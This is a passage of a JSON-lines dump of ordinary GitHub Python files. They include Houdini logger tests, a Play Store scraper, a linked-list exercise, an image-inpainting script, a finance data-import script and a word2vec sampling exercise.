HoudiniLoggerAdapter.status_bar.\"\"\"\n assert not test_adapter.status_bar\n\n test_adapter.status_bar = True\n assert test_adapter._status_bar\n\n # Methods\n\n def test_process__node_arg(self, test_adapter, mock_ui_unavailable):\n \"\"\"Test HoudiniLoggerAdapter.process() when passing a node.\"\"\"\n kwargs = {\"extra\": {\"node\": hou.node(\"/out\")}}\n\n test_adapter.node = hou.node(\"/obj\")\n\n result = test_adapter.process(\"test logger message\", kwargs)\n\n assert result == (\"/out - test logger message\", kwargs)\n\n def test_process__node_property(self, test_adapter, mock_ui_unavailable):\n \"\"\"Test HoudiniLoggerAdapter.process() when using the node property.\"\"\"\n kwargs = {\"extra\": {}}\n\n test_adapter.node = hou.node(\"/obj\")\n\n result = test_adapter.process(\"test logger message\", kwargs)\n\n assert result == (\"/obj - test logger message\", kwargs)\n\n def test_process__ui_passed_no_severity_no_title(\n self, mocker, test_adapter, mock_hou_ui\n ):\n \"\"\"Test HoudiniLoggerAdapter.process() when passing 'dialog' and 'status_bar' via the extra dict.\"\"\"\n mock_message = mocker.MagicMock(spec=str)\n\n kwargs = {\"extra\": {\"dialog\": True, \"status_bar\": True}}\n\n result = test_adapter.process(mock_message, kwargs)\n\n assert result == (mock_message, kwargs)\n\n mock_hou_ui.displayMessage.assert_called_with(\n mock_message, severity=hou.severityType.Message, title=None\n )\n mock_hou_ui.setStatusMessage.assert_called_with(\n mock_message, severity=hou.severityType.Message\n )\n\n def test_process__ui_properties_with_severity_and_title(\n self, mocker, test_adapter, mock_hou_ui\n ):\n \"\"\"Test HoudiniLoggerAdapter.process() passing 'dialog' and 'status_bar' via properties with a severity\n and title.\"\"\"\n test_adapter.dialog = True\n test_adapter.status_bar = True\n\n mock_message = mocker.MagicMock(spec=str)\n mock_title = mocker.MagicMock(spec=str)\n\n kwargs = {\"extra\": {\"severity\": hou.severityType.Error, \"title\": mock_title}}\n\n result = test_adapter.process(mock_message, kwargs)\n\n assert result == (mock_message, kwargs)\n\n mock_hou_ui.displayMessage.assert_called_with(\n mock_message, severity=hou.severityType.Error, title=mock_title\n )\n mock_hou_ui.setStatusMessage.assert_called_with(\n mock_message, severity=hou.severityType.Error\n )\n\n def test_process__message_args(self, test_adapter, mock_hou_ui):\n \"\"\"Test HoudiniLoggerAdapter.process() passing 'message_args'.\"\"\"\n test_adapter.dialog = True\n\n kwargs = {\"extra\": {\"message_args\": (\"extra\", 3)}}\n\n result = test_adapter.process(\"test logger message %s %d\", kwargs)\n\n assert result == (\"test logger message %s %d\", kwargs)\n\n mock_hou_ui.displayMessage.assert_called_with(\n \"test logger message extra 3\",\n severity=hou.severityType.Message,\n title=None,\n )\n\n def test_process__message_args_no_display(self, test_adapter, mock_hou_ui):\n \"\"\"Test HoudiniLoggerAdapter.process() passing 'message_args' but not displaying them.\"\"\"\n kwargs = {\"extra\": {\"message_args\": (\"extra\", 3)}}\n\n result = test_adapter.process(\"test logger message %s %d\", kwargs)\n\n assert result == (\"test logger message %s %d\", kwargs)\n\n mock_hou_ui.displayMessage.assert_not_called()\n\n def test_process__no_extra(self, mocker, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.process() when passing an empty kwargs dict.\"\"\"\n mock_message = mocker.MagicMock(spec=str)\n\n kwargs = {}\n\n result = test_adapter.process(mock_message, kwargs)\n\n assert result == (mock_message, 
kwargs)\n\n @pytest.mark.parametrize(\n \"level, severity, num_message_args, passed_kwargs\",\n [\n (\"info\", hou.severityType.ImportantMessage, 0, {\"status_bar\": True}),\n (\"warning\", hou.severityType.Warning, 1, {\"node\": hou.node(\"/obj\")}),\n (\"error\", hou.severityType.Error, 2, {\"dialog\": True}),\n (\"critical\", hou.severityType.Error, 1, {\"title\": \"A Title\"}),\n (\"debug\", hou.severityType.Message, 1, {\"stacklevel\": 3}),\n (\"exception\", hou.severityType.Error, 1, {}),\n ],\n )\n def test_calls(\n self, mocker, test_adapter, level, severity, num_message_args, passed_kwargs\n ):\n \"\"\"Test the various log calls.\n\n This helps to test the _wrap_logger functionality and that the wrapping occurred as expected.\n \"\"\"\n mock_logger = mocker.MagicMock(spec=logging.Logger)\n mocker.patch.object(test_adapter, \"logger\", mock_logger)\n\n mock_msg = mocker.MagicMock(spec=str)\n\n message_args = tuple(\n [mocker.MagicMock(spec=str) for i in range(num_message_args)]\n )\n\n kwargs = {\n \"foo\": 3, # A dummy extra kwarg our calling code does not care about\n }\n kwargs.update(passed_kwargs)\n\n # We're going to mock process() call to determine whether all our wrapper logic\n # runs and passes the expected data for the actual log call.\n mock_process = mocker.patch(\n \"houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.process\",\n return_value=(mocker.MagicMock(spec=str), kwargs),\n )\n\n expected_kwargs = {\n \"foo\": 3,\n \"extra\": {\n \"severity\": severity,\n },\n \"stacklevel\": passed_kwargs.get(\"stacklevel\", 4),\n }\n\n # If there were any extra message args we expect them to have been added\n # to the extra dict.\n if num_message_args:\n expected_kwargs[\"extra\"][\"message_args\"] = message_args\n\n for arg, value in passed_kwargs.items():\n if arg in (\"node\", \"dialog\", \"status_bar\", \"title\"):\n expected_kwargs[\"extra\"][arg] = value\n\n # If logging an exception, ensure that exc_info=True is passed.\n if level == \"exception\":\n expected_kwargs[\"exc_info\"] = True\n\n getattr(test_adapter, level)(mock_msg, *message_args, **kwargs)\n\n mock_process.assert_called_with(mock_msg, expected_kwargs)\n","repo_name":"captainhammy/Houdini-Toolbox","sub_path":"tests/python/logging/test_adapters.py","file_name":"test_adapters.py","file_ext":"py","file_size_in_byte":9304,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"35"} +{"seq_id":"31239844934","text":"import play_scraper\nimport json\n\n\ndef main():\n with open('input_file', 'r', encoding='utf-8') as file:\n for query in file.readlines():\n answer = play_scraper.search(query=query, page=12, detailed=True)\n if answer:\n for app in answer:\n file = open(f'exit/{app[\"app_id\"]}.json', 'w')\n out = {}\n for i, j in app.items():\n try:\n j = j.decode('utf-8')\n except:\n pass\n finally:\n out[i] = j\n json.dump(out, file, indent=4, sort_keys=True)\n else:\n main()\n\nif __name__ == '__main__':\n main()","repo_name":"Vladikasik/Kwork-googleplay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6643789704","text":"class Node:\r\n\r\n def __init__(self,val) -> None:\r\n self.value=val\r\n self.next=None\r\n\r\nclass LinkedList:\r\n def __init__(self) -> None:\r\n self.head=None\r\n\r\n\r\n def insert_node(self,node):\r\n if self.head==None:\r\n self.head=node\r\n else:\r\n node.next=self.head\r\n 
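# the new node now points at the old head, so moving self.head below completes an O(1) prepend\r\n 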
self.head=node\r\n\r\n\r\n def traverse_list(self):\r\n if self.head==None:\r\n print(\"Empty list\")\r\n else:\r\n temp=self.head\r\n while(temp!=None):\r\n print(temp.value)\r\n temp=temp.next\r\n def delete_element(self,dele_val):\r\n # removes the nodes whose value equals dele_val\r\n if self.head==None:\r\n print(\"List is empty...Nothing to be deleted\")\r\n else:\r\n if self.head.value == dele_val:\r\n self.head=self.head.next\r\n temp=self.head\r\n # stop at the last node so temp.next is always safe to inspect\r\n while(temp!=None and temp.next!=None):\r\n if temp.next.value==dele_val:\r\n temp.next=temp.next.next\r\n else:\r\n temp=temp.next\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n llist=LinkedList()\r\n num=int(input(\"How many elements do you want to enter: \"))\r\n for i in range(num):\r\n ele=int(input(\"Enter your element: \"))\r\n temp = Node(ele)\r\n llist.insert_node(temp)\r\n print(\"Here is your list \")\r\n llist.traverse_list()\r\n delete_value=int(input(\"Enter the element to be deleted: \"))\r\n llist.delete_element(delete_value)\r\n print(\"After deletion of {} from the linked list...Here is your list\".format(delete_value))\r\n llist.traverse_list()\r\n\r\n \r\n","repo_name":"luharukas/Operation-on-Data-Structure","sub_path":"Delete_node_from_linked_list.py","file_name":"Delete_node_from_linked_list.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"27919688312","text":"from pathlib import Path\n\nfrom skimage.color import grey2rgb\nfrom skimage.io import imread, imsave\nfrom skimage.morphology import binary_dilation\nfrom skimage import img_as_uint, img_as_float\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.ndimage as ndi\n\nfrom inpainting import Inpainting\nimport inpainting.utils as op\n\n\n#############################################################################\n# create directory for the output\n\n\nPath(\"output/\").mkdir(parents=True, exist_ok=True)\n\n\n#############################################################################\n# patch shape and weight\n\npatch_shape = (15,15)\npatch_weight = op.gauss_weight(patch_shape,patch_sigma=5).reshape(patch_shape)\nTOL=1.e-4\n\n\n#############################################################################\n# image and mask\n\nimage = img_as_float(imread('./data/image.png')[:,:,0:3])\nmask = imread(\"./data/mask.png\",as_gray=True).astype(np.bool)\n\n#############################################################################\n# example setup\n\nnonlocal_target_mask = binary_dilation( binary_dilation( mask, selem=np.ones((2,2)) ), selem=np.ones(patch_shape) )\nnonlocal_source_mask = nonlocal_target_mask.copy()\nnonlocal_source_mask[patch_shape[0]//2:-patch_shape[0]//2,patch_shape[0]//2:-patch_shape[0]//2] = np.logical_not(nonlocal_target_mask[patch_shape[0]//2:-patch_shape[0]//2,patch_shape[0]//2:-patch_shape[0]//2])\nimage_setup = image.copy()\n# image_setup[mask,0] = 0.95\n# image_setup[mask,1] = 0.80\nimage_setup[mask,0] = 0.75\nimage_setup[mask,1] = 0.0\nimage_setup[mask,2] = 0.0\nimage_setup[nonlocal_source_mask,0] = 0.29\nimage_setup[nonlocal_source_mask,1] = 0.65\nimage_setup[nonlocal_source_mask,2] = 0.12\nalpha = 0.5\nimage_setup[mask,:] = ((1-alpha)*image + alpha*image_setup)[mask,:]\nimage_setup[nonlocal_source_mask,:] = ((1-alpha)*image + alpha*image_setup)[nonlocal_source_mask,:]\nimsave(\"./output/example_setup.png\", op.add_patch(image_setup, patch_weight))\n\nmasked_chair = image.copy()\n# masked_chair[mask,:] = 
((1-alpha)*image + alpha*mask.astype(np.float)[:,:,np.newaxis])[mask,:]\nmasked_chair[mask,0] = (1-alpha)*image[mask,0] + alpha*mask.astype(np.float)[mask]\nimsave(\"./output/masked_chair.png\", masked_chair)\n\ninp_region = np.zeros_like(image)\ninp_region[...] = 0.75\ninp_region[mask,:] = 1\nimsave(\"./output/chair_inp_region.png\", inp_region)\n\nconv_mask = binary_dilation( mask, selem=np.ones(patch_shape) )\nnonlocal_target_mask = binary_dilation( conv_mask, selem=np.ones(patch_shape) )\next_inp_region = np.zeros_like(image)\next_inp_region[...] = 0.75\next_inp_region[nonlocal_target_mask,:] = 0.\next_inp_region[nonlocal_target_mask,2] = 0.9\next_inp_region[conv_mask,:] = 0\next_inp_region[conv_mask,1] = 0.9\next_inp_region[mask,:] = 0.5\next_inp_region[mask,0] = 0.95\next_inp_region[20:50,20:50,:] = 0.5\next_inp_region[20:50,20:50,0] = 0.95\next_inp_region[60:90,20:50,:] = 0\next_inp_region[60:90,20:50,1] = 0.9\next_inp_region[100:130,20:50,:] = 0\next_inp_region[100:130,20:50,2] = 0.9\nimsave(\"./output/chair_ext_inp_region.png\", ext_inp_region)\n# exit()\n\n\n#############################################################################\n# make lambda from edges\n\nasympt_val = 0.1\ndecay_time = 10\n\nedges = imread(\"./data/edges.png\",as_gray=True).astype(np.bool)\nedge_coef = (1-asympt_val) * np.exp(-ndi.distance_transform_edt(1-edges)/decay_time) + asympt_val\nedge_coef = 1 - edge_coef\nedge_coef /= np.amax(edge_coef)\nedge_coef[edge_coef<1.e-6] = 1.e-4\nimsave(\"./output/edges_coef.png\",img_as_float(edge_coef))\n\ncolor_edges = image.copy()\ncolor_edges[mask,:] = 1\ncolor_edges[edges,0] = 0\ncolor_edges[edges,1] = 0.4\ncolor_edges[edges,2] = 1\ncolor_edges[np.logical_and(edges,mask),0] = 1\ncolor_edges[np.logical_and(edges,mask),1] = 0\ncolor_edges[np.logical_and(edges,mask),2] = 0\nimsave(\"./output/color_edges.png\", color_edges)\n# exit()\n\n\n#############################################################################\n# Patch nonlocal means\n\nkernels = [[[1]]]\nlambdas = [1]\nproblem = Inpainting(image, mask, as_gray=False, kernels=kernels, lambdas=lambdas, patch_shape=patch_shape, patch_weight=patch_weight)\nresult = problem.process(num_scales=1, initialization='harmonic', TOL=TOL)\nimsave(\"./output/means.png\", op.add_patch(result, patch_weight))\n# exit()\n\n\n#############################################################################\n# Local PDE inpainting\n\nharmonic = image.copy()\nInpainting.inpaint_PDE(None, np.moveaxis(harmonic,-1,0), mask, 'harmonic')\nimsave(\"./output/harmonic.png\", harmonic)\n# exit()\n\n# with edge completion\nharmonic_edges = image.copy()\nInpainting.inpaint_PDE(None, np.moveaxis(harmonic_edges,-1,0), mask, 'harmonic', edge_coef)\nimsave(\"./output/harmonic_edges.png\", harmonic_edges)\n# exit()\n\n\n#############################################################################\n# Patch nonlocal Poisson\n\nkernels = op.grad_kernels(\"forward\")\nlambdas = [1.0,1.0]\nproblem = Inpainting(image, mask, as_gray=False, kernels=kernels, lambdas=lambdas, patch_shape=patch_shape, patch_weight=patch_weight)\nresult = problem.process(num_scales=1, initialization=harmonic, TOL=TOL)\nimsave(\"./output/nonloc_harmonic.png\", op.add_patch(result, patch_weight))\n# exit()\n\n# with edge completion\nkernels = op.grad_kernels(\"forward\")\nlambdas = [edge_coef,edge_coef]\nproblem = Inpainting(image, mask, as_gray=False, kernels=kernels, lambdas=lambdas, patch_shape=patch_shape, patch_weight=patch_weight)\nresult = problem.process(num_scales=1, 
initialization=harmonic_edges, TOL=TOL)\nimsave(\"./output/nonloc_harmonic_edges.png\", op.add_patch(result, patch_weight))\n# exit()","repo_name":"vreshniak/feature-driven-exemplar-inpainting","sub_path":"examples/example_3/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} {"seq_id":"74972136100","text":"import pandas as pd\nimport numpy as np\nfrom sql_setting import *\nfrom openpyxl import load_workbook\nimport openpyxl\n\ndef original_import(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",log_name=\"log.csv\",del_name=\"del.csv\"):\n # import the raw data exported from the system\n log_table = pd.read_csv(r\"{}\\{}\".format(file_path,log_name))\n log_table.to_sql(\"user_account_integral_log\", engine, if_exists=\"replace\", index=False)\n del_table = pd.read_csv(r\"{}\\{}\".format(file_path, del_name))\n del_table.to_sql(\"user_account_integral_del\", engine, if_exists=\"replace\", index=False)\n sql = 'UPDATE user_account_integral_del SET action_id = \"107\" ,action_name = \"EVOS购车客户定向权益\" ' \\\n 'WHERE user_id = 66670 and action_id = 112'\n cursor.execute(sql)\n cursor.commit()\n print(\"Data import finished\")\n\n\n\n\ndef jingdong_import(file_path,jingdong_name,sheet_name):\n # import the raw JD (jingdong) statement data\n jingdong = pd.read_excel(r\"{}\\{}\".format(file_path,jingdong_name),sheet_name=sheet_name)\n if \"退款金额\" in jingdong.columns:\n jingdong[\"实际支付金额\"] = jingdong[\"商品含税总额\"] - jingdong[\"退款金额\"]\n else:\n jingdong[\"实际支付金额\"] = jingdong[\"商品含税总额\"]\n filter_str = ['业务单号(子订单号)', '原始订单号', '下单时间', '商品类型', '商品编号', '商品名称', '商品税率', '商品数量', '商品含税单价',\n '商品含税总额', \"实际支付金额\"]\n rename_dict = {\"业务单号(子订单号)\": \"child_number\", \"原始订单号\": \"origin_number\", \"下单时间\": \"order_time\",\n \"商品类型\": \"business_type\", \"商品编号\": \"business_code\",\n \"商品名称\": \"business_name\", \"商品税率\": \"business_tax\", \"商品数量\": \"jbussiness_number\",\n \"商品含税单价\": \"bussiness_tax_price\", \"商品含税总额\": \"business_total_tax_price\",\n \"实际支付金额\": \"pay_price\"}\n if \"月份\" in jingdong.columns.tolist():\n filter_str.append(\"月份\")\n rename_dict[\"月份\"] = \"filter_month\"\n jingdong = jingdong[filter_str]\n # '商品未税总额(未税单价*数量)', '商品未税单价',\n jingdong.rename(columns=rename_dict, inplace=True)\n jingdong[\"child_number_code\"] = jingdong.apply(lambda x: \"jd\" + str(x[\"child_number\"])+str(x[\"business_code\"]),axis=1)\n # business = jingdong[jingdong[\"business_type\"] != \"运费\"]\n jingdong.reset_index(drop=True,inplace=True)\n jingdong.to_sql(\"jingdong\", engine, if_exists=\"replace\")\n # \"商品未税总额(未税单价*数量)\": \"business_total_price\",\n # \"商品未税单价\": \"bussiness_price\",\n # spread the shipping fee across every item\n\n # jingdong[[\"origin_number\", \"business_code\"]] = jingdong[[\"origin_number\", \"business_code\"]].astype(str)\n # jingdong[\"business_code\"] = jingdong[\"business_code\"].apply(lambda x: str(x).replace(\"fre\", \"\"))\n # jingdong[\"Identification_code\"] = jingdong[\"origin_number\"] + jingdong[\"business_code\"]\n #\n # freight = jingdong[jingdong[\"business_type\"] == \"运费\"][[\"Identification_code\",\"origin_number\", \"business_code\",\n # \"bussiness_tax_price\"]]\n #\n # freight.drop([\"origin_number\",\"business_code\"],axis=1,inplace=True)\n # freight.rename(columns={\"bussiness_tax_price\":\"flow_fee\"},inplace=True)\n # business = jingdong[jingdong[\"business_type\"] != \"运费\"]\n # rebuild the original shipping fee\n # count_number = pd.pivot_table(business, index=\"origin_number\", values=\"bussiness_number\", aggfunc=np.sum)\n #\n # count_number.reset_index(inplace=True)\n\n # 
freight = pd.pivot_table(freight,index=\"origin_number\", values=\"business_total_tax_price\", aggfunc=np.sum)\n #\n #\n # freight = pd.merge(count_number, freight, how=\"left\", left_on=\"origin_number\",right_on=\"origin_number\")\n #\n # freight.columns = [\"origin_number\", \"bussiness_total_number\", \"flow_fee\"]\n # freight.fillna(0, inplace=True)\n # freight.to_excel(\"yunfei.xlsx\")\n # business.to_excel(\"diyi.xlsx\")\n # result = pd.merge(business, freight, how=\"left\", on=\"Identification_code\")\n # result.fillna(0,inplace=True)\n # result[\"real_pay_price\"] = result[\"flow_fee\"] / result[\"bussiness_total_number\"] * result[\"bussiness_number\"] + \\\n # result[\"pay_price\"]\n\n # result[\"real_pay_price\"] = result.loc[:,\"bussiness_tax_price\"] + result.loc[:,\"flow_fee\"]\n #\n # result.to_sql(\"jingdong\", engine, if_exists=\"replace\")\n\n\ndef jingdong_relationship(file_path,file_name,sheet_list):\n # import the JD order mapping table\n i=0\n for sheet in sheet_list:\n relation_file = pd.read_excel(r\"{}\\{}\".format(file_path, file_name),sheet_name=sheet)\n relation_file = relation_file[['京东订单号', '订单号', '电话', '商品编号','商品名', '商城单价', '数量', '商品品类']]\n # '物流单号',\n relation_file.rename(columns={'京东订单号': 'child_number',\n '订单号': 'business_id', '电话': 'oder_phone', '商品编号':'business_code','商品名': 'business_name',\n '商城单价': 'business_price', '数量': 'business_number', '商品品类': 'business_type'},\n inplace=True)\n relation_file = relation_file.astype(str)\n relation_file[\"business_id_code\"] = relation_file.apply(lambda x: str(x['business_id'])+str(x['business_code']).replace(\" \",\"\"),axis=1)\n relation_file['child_number_code'] = relation_file.apply(lambda x: \"jd\"+str(x['child_number'])+str(x['business_code']).replace(\" \",\"\"),axis=1)\n # '物流单号': ' logistics_number',\n if i == 0:\n relation_file.to_sql(\"guanxi\", engine, if_exists=\"replace\",index=False)\n i+=4\n else:\n relation_file.to_sql(\"guanxi\", engine, if_exists=\"append\", index=False)\n\ndef action_relationship(file_path,file_name,sheet_name):\n # pid mapping import (disabled)\n pid = pd.read_excel(r\"{}\\{}\".format(file_path,file_name), sheet_name=sheet_name)\n pid = pid[['对应活动action_id', 'program_id', '对应活动action_name', '有偿无偿']]\n pid.rename(columns={'对应活动action_id': 'action_id', 'program_id': 'program_id', '对应活动action_name': 'action_name',\n '有偿无偿': 'judge'}, inplace=True)\n pid.to_sql(\"action_programid\",engine, if_exists=\"replace\", index=False)\n\ndef pid_aid(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",file_name=\"Program_ID与Action_ID对应关系表导入版本.xlsx\"):\n # import the program_id / action_id mapping\n\n sql = \"TRUNCATE action_program\"\n cursor.execute(sql)\n cursor.commit()\n wt = load_workbook(filename=r\"{}\\{}\".format(file_path,file_name))\n common_2021 = wt[\"2021年\"]\n common_2022 = wt[\"2022常规行为\"]\n active_2022 = wt[\"2022其他行为\"]\n for i in range(2,common_2021.max_row):\n if common_2021.cell(row=i,column=1).value:\n sql = \"INSERT INTO 
action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \"\\\n .format(common_2021.cell(row=i,column=1).value,common_2021.cell(row=i,column=3).value,\n common_2021.cell(row=i,column=2).value,common_2021.cell(row=i,column=4).value,\n common_2021.cell(row=i,column=5).value,common_2021.cell(row=i,column=6).value,\n \"2021-01\",\"2021-12\")\n cursor.execute(sql)\n else:\n break\n cursor.commit()\n for i in range(2,common_2022.max_row):\n if common_2022.cell(row=i,column=1).value:\n sql = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \"\\\n .format(common_2022.cell(row=i,column=1).value,common_2022.cell(row=i,column=2).value,\n common_2022.cell(row=i,column=6).value,common_2022.cell(row=i,column=3).value,\n common_2022.cell(row=i,column=4).value,common_2022.cell(row=i,column=5).value,\n \"2022-01\",\"2022-03\")\n cursor.execute(sql)\n sql1 = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \" \\\n .format(common_2022.cell(row=i, column=1).value, common_2022.cell(row=i, column=2).value,\n common_2022.cell(row=i, column=7).value, common_2022.cell(row=i, column=3).value,\n common_2022.cell(row=i, column=4).value, common_2022.cell(row=i, column=5).value,\n \"2022-04\", \"2022-06\")\n cursor.execute(sql1)\n sql1 = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \" \\\n .format(common_2022.cell(row=i, column=1).value, common_2022.cell(row=i, column=2).value,\n common_2022.cell(row=i, column=8).value, common_2022.cell(row=i, column=3).value,\n common_2022.cell(row=i, column=4).value, common_2022.cell(row=i, column=5).value,\n \"2022-07\", \"2022-09\")\n cursor.execute(sql1)\n else:\n break\n cursor.commit()\n for i in range(2,active_2022.max_row):\n if active_2022.cell(row=i, column=1).value:\n sql = \"INSERT INTO action_program(action_id,action_name,\" \\\n \"program_id,integral_judge,action_type,use_type,start_month,end_month) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}') \" \\\n .format(active_2022.cell(row=i, column=1).value, active_2022.cell(row=i, column=3).value,\n active_2022.cell(row=i, column=2).value, active_2022.cell(row=i, column=4).value,\n active_2022.cell(row=i, column=5).value, active_2022.cell(row=i, column=6).value,\n \"2022-01\", \"2023-04\")\n print(active_2022.cell(row=i, column=1).value)\n cursor.execute(sql)\n else:\n break\n cursor.commit()\n\ndef fuyu_jingdong(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",file_name=\"商城订单1.xlsx\"):\n # import Fuyu mall orders\n fuyu = pd.read_excel(r\"{}\\{}\".format(file_path,file_name),converters={\"实际单价\": int,\"数量\":int,\"来源spu\":str})\n # fuyu = fuyu[(fuyu[\"订单状态\"] != 7) & (fuyu[\"退款状态\"] != 1) & (fuyu[\"订单状态\"] != 4)]\n fuyu = fuyu[fuyu[\"退款状态\"] != 1]\n fuyu = fuyu[[\"订单号\",\"供货商\",\"SKU\",\"数量\",\"来源spu\",\"实际单价\",\"商品名称\",\"订单状态\"]]\n fuyu.rename(columns={\"订单号\":\"business_id\",\"供货商\":\"business_channel\",\"SKU\":\"sku\",\n \"数量\":\"business_quantity\",\"来源spu\":\"spu\",\"实际单价\":\"business_price\",\n \"订单状态\":\"order_statue\",\"商品名称\":\"business_name\"},inplace=True)\n # print(fuyu.info)\n # fuyu[\"business_single_price\"] = fuyu[\"business_price\"]-fuyu[\"business_quantity\"]\n\n fuyu.reset_index(drop=True,inplace=True)\n fuyu[\"business_id_code\"] = fuyu.apply(lambda x: str(x[\"business_id\"])+str(x[\"spu\"]),axis=1)\n\n # fuyu[\"business_id\"] = fuyu[\"business_id\"].apply(lambda x: str(x).split(\"_\")[0])\n\n fuyu.to_sql(\"business_relationship\",engine,if_exists=\"replace\")\n sql = 'UPDATE business_relationship set spu=\"5237209\" WHERE business_id=\"M0577127583677861888\" and spu = \"5158704\"'\n cursor.execute(sql)\n cursor.commit()\n\ndef fuyu_skuinfo(file_path=\"D:\\\\1何军\\\\财务系统\\\\系统导出数据\",file_name=\"商城订单sku.csv\"):\n fuyu = 
pd.read_csv(r\"{}\\{}\".format(file_path, file_name))\n fuyu = fuyu[fuyu[\"refund_stauts\"] != 1]\n # fuyu = fuyu[fuyu[\"send_num\"].notnull()]\n fuyu = fuyu[[\"order_no\", \"buy_num\", \"sku_code\", \"shared_fb\", \"spu_name\", \"business_channel\"]]\n fuyu.rename(columns={\"order_no\": \"business_id\", \"business_channel\": \"business_channel\", \"sku_code\": \"sku\",\n \"buy_num\": \"business_quantity\", \"shared_fb\": \"business_price\",\n \"spu_name\": \"business_name\"}, inplace=True)\n\n fuyu.reset_index(drop=True, inplace=True)\n\n # fuyu[\"business_id\"] = fuyu[\"business_id\"].apply(lambda x: str(x).split(\"_\")[0])\n fuyu.to_sql(\"business_relationship\", engine, if_exists=\"replace\")\n\ndef caiwu_account(file_path=\"D:\\\\1何军\\\\财务系统\",file_name=\"积分原始数据.xlsx\"):\n # raw points reconciliation data\n caiwu = pd.read_excel(r\"{}\\{}\".format(file_path,file_name),dtype={\"sale_month\": str})\n six_caiwu = pd.read_excel(r\"{}\\{}\".format(file_path,\"6原始数据.xlsx\"),dtype={\"sale_month\": str})\n seven_caiwu = pd.read_excel(r\"{}\\{}\".format(file_path, \"7原始数据.xlsx\"), dtype={\"sale_month\": str})\n sum_caiwu = pd.concat([caiwu,six_caiwu,seven_caiwu],axis=0)\n sum_caiwu[\"sale_month\"] = sum_caiwu[\"sale_month\"].apply(lambda x: str(x)[:7])\n sum_caiwu.reset_index(drop=True,inplace=True)\n sum_caiwu.to_sql(\"caiwu_account\",engine, if_exists=\"replace\")\n\ndef dashang_import():\n sibada = pd.read_excel(r\"D:\\1何军\\财务系统\\系统导出数据\\dashang.xlsx\")\n sibada.to_sql(\"dashang\", engine, if_exists=\"replace\", index=False)\n\nif __name__==\"__main__\":\n # raw data import\n # original_import()\n # fuyu_jingdong()\n # fuyu_skuinfo()\n # import the action_id / program_id mapping\n # pid_aid()\n # caiwu_account()\n # dashang (tipping) data\n # dashang_import()\n # fuyu_jingdong()\n # import the raw JD data\n jingdong_import(file_path=\"D:\\\\1何军\\\\财务对账\\\\4月\",jingdong_name=\"京东原始数据0325-0424.xlsx\",sheet_name=\"Sheet1\")\n # import Yan Hao's mapping table\n # jingdong_relationship(file_path=\"D:\\\\1何军\\\\财务系统\",file_name=\"福域积分商城订单明细表(1月-6月).xlsx\",\n # sheet_list=[\"1月\",\"2月\",\"3月\",\"4月\",\"5月\",\"6月\"])\n # jingdong_import(file_path=\"D:\\\\1何军\\\\京东数据\\\\2报账单\",jingdong_name=\"1-5月原始数据汇总.xlsx\",sheet_name=\"Sheet1\")\n\n\n\n\",\n","repo_name":"cornelius-git/salesdata","sub_path":"salesdata/business/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":14505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"38829168948","text":"import sys\nimport ast\nimport numpy as np\n\n\ndef parse_array(s):\n return np.array(ast.literal_eval(s))\n\ndef read_array():\n return parse_array(sys.stdin.readline())\n\ndef write_array(arr):\n print(repr(arr.tolist()))\n\n\ndef generate_w2v_sgns_samples(text, window_size, vocab_size, ns_rate):\n \"\"\"\n text - list of integer numbers - ids of tokens in text\n window_size - odd integer - width of window\n vocab_size - positive integer - number of tokens in vocabulary\n ns_rate - positive integer - number of negative tokens to sample per one positive sample\n\n returns list of training samples (CenterWord, CtxWord, Label)\n \"\"\"\n samples = []\n for i in range(len(text)):\n for j in range(i - window_size // 2, i + window_size // 2 + 1):\n if j < 0 or j >= len(text) or j == i:\n continue\n samples.append((text[i], text[j], 1))\n for _ in range(ns_rate):\n # negative samples\n samples.append((text[i], np.random.randint(0, vocab_size), 0))\n return samples\n\n\n# text = read_array()\n# window_size = int(sys.stdin.readline().strip())\n# vocab_size = 
int(sys.stdin.readline().strip())\n# ns_rate = int(sys.stdin.readline().strip())\ntext = [1,2,3,4]\nwindow_size = 3\nvocab_size = 5\nns_rate = 2\n\nresult = generate_w2v_sgns_samples(text, window_size, vocab_size, ns_rate)\n\nwrite_array(np.array(result))","repo_name":"Vechtomov/stepik-dl-nlp","sub_path":"solutions/task_3_4_1.py","file_name":"task_3_4_1.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} {"seq_id":"10235587876","text":"import sys\ninput = sys.stdin.readline\n\nS = input().rstrip()\n\nnums = []\ncals = []\nnum = 0\n\nfor s in S:\n if s.isdigit():\n num = num*10 + int(s)\n else:\n nums.append(num)\n num = 0\n cals.append(s)\nnums.append(num)\n\n# print(nums)\n# print(cals)\n\nans = nums[0]\n_minus = False\n\nfor i in range(len(cals)):\n if cals[i] == '+':\n if _minus:\n ans -= nums[i+1]\n else:\n ans += nums[i+1]\n elif cals[i] == '-':\n ans -= nums[i+1]\n 